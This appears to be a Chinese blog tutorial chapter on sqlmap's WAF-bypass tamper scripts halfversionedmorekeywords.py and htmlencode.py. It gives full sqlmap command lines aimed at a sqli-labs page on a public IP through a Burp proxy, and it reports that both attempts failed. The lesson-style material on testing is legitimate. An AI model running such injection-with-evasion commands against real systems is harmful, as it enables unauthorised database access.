0
点赞
收藏
分享

微信扫一扫

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py

18. halfversionedmorekeywords.py脚本

在每个关键字之前都加上Mysql注释,用于过滤了关键字的情况,这个适用于Mysql数据库<5.1版本

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="halfversionedmorekeywords.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_mysql数据库

 

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_html_02

 

 发现并没有识别出来sql注入,目标是高于mysql数据库5.1版本的,所以不行,那我们看看burp的抓包情况,如下:

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_html_03

 

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_抓包_04

 

 

19. htmlencode.py脚本

针对测试的payload进行html编码,适用于所有数据库,具体看下面的演示

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="htmlencode.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_html_05

 

 同样是测试不出来结果,看看burp的抓包情况:

sqlmap从入门到精通-第七章-7-9 绕过WAF脚本-escapequotes.py&halfversionedmorekeywords.py_抓包_06

 

 进行html编码后的结果就是如:&#41;&#32; 类似的形式

迷茫的人生,需要不断努力,才能看清远方模糊的志向!

举报

相关推荐

0 条评论